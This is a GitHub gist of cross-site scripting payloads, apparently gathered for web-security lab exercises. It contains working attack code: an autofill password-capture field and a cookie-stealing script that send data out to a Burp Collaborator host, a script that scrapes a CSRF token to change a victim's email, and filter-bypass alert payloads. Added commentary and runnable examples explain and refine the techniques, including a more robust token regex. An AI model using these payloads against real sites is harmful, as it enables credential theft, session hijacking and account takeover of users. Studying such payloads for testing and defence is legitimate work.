@Ryman
Forked from kibelous/capture-passwords.js
Created September 6, 2022 21:43
[XSS] Malicious payloads
// if users use password managers to autofill credentials
// onchange fires when the field's value changes, which an autofill does; the pair is
// then POSTed to the collaborator. `username` resolves through the browser's named
// access on window for the element with id="username".
<input name='username' id='username'>
<input type='password' name='password' onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
// The exploit uses exception handling to call the alert function with an argument.
// `throw` is separated from its operand by an empty block comment (/**/) to get round
// the no-spaces restriction. The operand is a comma expression: it first assigns alert
// to the onerror exception handler, then evaluates to 1337, which is the value thrown.
// As throw is a statement, it cannot be used as an expression. Instead, an arrow function
// with a block body ({ ... }) is used so that the throw statement is allowed; x=x=>{...}
// is `x = (x) => {...}`, a one-parameter arrow whose parameter is unused.
// The function then has to be called without parentheses, so it is assigned to the
// toString property of window and triggered by forcing a string conversion on window
// (window+''). The resulting uncaught exception is delivered to onerror, i.e. alert.
// URL-encoded, as placed in the URL parameter:
x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27
// Decoded:
x=x=>{throw/**/onerror=alert,1337},toString=x,window+''
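The following is an added example, not part of the gist: an offline model of the throw/onerror trick above that can be run under Node. `win` stands in for the browser's window object and `dispatch` for the browser's uncaught-exception handling that invokes window.onerror; both are assumptions made so the evaluation order (handler installed first, then the throw, then string coercion delivering the value to the handler) can be checked.

```javascript
// Added example, not from the gist: an offline model of the throw/onerror trick.
// `win` stands in for window and `dispatch` for the browser's uncaught-exception
// handling; both are simplifications assumed here so the mechanism runs under Node.

const received = [];                         // what the stand-in alert is called with
const fakeAlert = (msg) => { received.push(msg); };

// Stand-in for window: a plain object. `win + ''` tries valueOf (returns the
// object, not a primitive) and then toString, which the payload overrides.
const win = { onerror: null, alert: fakeAlert };

// Stand-in for the browser: an exception that escapes to the top level is passed
// to onerror if one is installed. A real browser passes a message string such as
// "Uncaught 1337"; the raw thrown value is passed here so it can be checked.
function dispatch(err) {
  if (typeof win.onerror === 'function') {
    win.onerror(err);
  }
}

// The payload rewritten against `win` instead of the implicit global object:
//   x=x=>{throw/**/onerror=alert,1337},toString=x,window+''
function runPayload() {
  received.length = 0;
  win.onerror = null;

  // x=x=>{...} is `x = (x) => {...}`: a one-parameter arrow; the parameter is unused.
  // The block body is what makes the `throw` statement legal here, and /**/ takes
  // the place of the space between throw and its operand. The operand
  // `win.onerror = win.alert, 1337` installs the handler first and then evaluates
  // to 1337, so 1337 is the value thrown.
  const x = (x) => { throw/**/win.onerror = win.alert, 1337; };
  win.toString = x;

  let thrown;
  try {
    void (win + '');                         // string coercion calls win.toString(), which throws
  } catch (e) {
    thrown = e;
    dispatch(e);                             // what the browser does with the uncaught throw
  }
  return {
    handlerInstalled: win.onerror === win.alert,   // true: assignment ran before the throw
    alertArg: received[0],                         // 1337: value handed to the handler
    thrown,
  };
}
```

Running `runPayload()` shows that by the time the exception reaches the handler, `onerror` already points at `alert`, which is why the single comma expression is enough to both install and fire it.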
<script>
// Same-origin script: read the CSRF token from /my-account, then submit the
// change-email form with it. A CSRF token does not protect against XSS, because
// the injected script can read it like any other page content.
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
// (\w+)" needs the closing quote right after word characters, so a token containing
// '-', '+', '/' or '=' does not match and [1] throws on null; widen to ([^"]+) if so.
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
// No Content-Type is set, so a string body is sent as text/plain;charset=UTF-8.
// Set application/x-www-form-urlencoded with setRequestHeader if the target requires it.
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
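The following is an added example, not part of the gist: the token-scraping step of the payload above, run against a constructed /my-account response so the regex behaviour can be checked offline. The form markup, the token values and the helper names (`accountPage`, `extractCsrfToken`, `buildChangeEmailBody`) are all made up for the demonstration.

```javascript
// Added example, not from the gist: scraping the CSRF token and building the
// form body, against a constructed page. Markup and token values are invented.

// Constructed stand-in for the /my-account HTML; the change-email form carries
// the CSRF token in a hidden input, which is what the payload scrapes.
function accountPage(token) {
  return `<form class="login-form" method="POST" action="/my-account/change-email">
  <label>Email</label>
  <input required type="email" name="email" value="">
  <input required type="hidden" name="csrf" value="${token}">
  <button class="button" type="submit">Update email</button>
</form>`;
}

// The gist's regex. (\w+)" requires the closing quote to follow word characters
// directly, so a token containing '-', '+', '/' or '=' fails to match at all.
const GIST_PATTERN = /name="csrf" value="(\w+)"/;

// Widened: everything up to the closing quote, tolerating other attributes or
// extra whitespace between the name and value attributes.
const ROBUST_PATTERN = /name="csrf"[^>]*?value="([^"]+)"/;

// Returns the token or null. The gist indexes match(...)[1] directly, which
// throws a TypeError on a null match and silently ends the payload.
function extractCsrfToken(html, pattern = ROBUST_PATTERN) {
  const m = html.match(pattern);
  return m ? m[1] : null;
}

// Encode the body as a real form submission would. URLSearchParams
// percent-encodes '@' and '=', which the gist's string concatenation does not.
function buildChangeEmailBody(token, email) {
  return new URLSearchParams({ csrf: token, email }).toString();
}
```

With an alphanumeric token both patterns agree; with a token such as `a1b2-c3d4=` the gist's pattern returns null while the widened one returns the full value, and the encoded body comes out as `csrf=a1b2-c3d4%3D&email=test%40test.com`.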
<script>
// Exfiltrates the cookies visible to script; cookies flagged HttpOnly are not
// included in document.cookie. mode:'no-cors' lets the cross-origin POST go out
// without a preflight; the opaque response does not matter here.
fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
// Click-triggered SVG payload: <animate> sets the <a> href to a javascript: URL,
// so clicking the text runs alert(1). URL-encoded form:
%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E%3C%2Fsvg%3E
// Decoded:
<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a></svg>